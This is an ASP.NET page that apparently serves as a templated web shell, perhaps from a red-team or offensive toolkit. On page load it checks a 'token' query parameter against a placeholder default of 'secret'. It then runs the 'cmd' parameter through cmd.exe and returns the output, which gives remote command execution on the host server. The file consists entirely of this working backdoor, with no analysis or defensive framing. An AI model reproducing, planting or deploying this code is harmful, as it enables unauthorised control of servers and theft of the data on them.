<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
    void Page_Load(object sender, EventArgs e) {
        string token = "{{ token | default('secret') }}";
        if (Request.QueryString["token"] == token) {
            string cmd = Request.QueryString["cmd"];
            if (!string.IsNullOrEmpty(cmd)) {
                ProcessStartInfo psi = new ProcessStartInfo();
                psi.FileName = "cmd.exe";
                psi.Arguments = "/c " + cmd;
                psi.RedirectStandardOutput = true;
                psi.UseShellExecute = false;
                Process p = Process.Start(psi);
                Response.Write(p.StandardOutput.ReadToEnd());
                p.WaitForExit();
            }
        }
    }
</script>
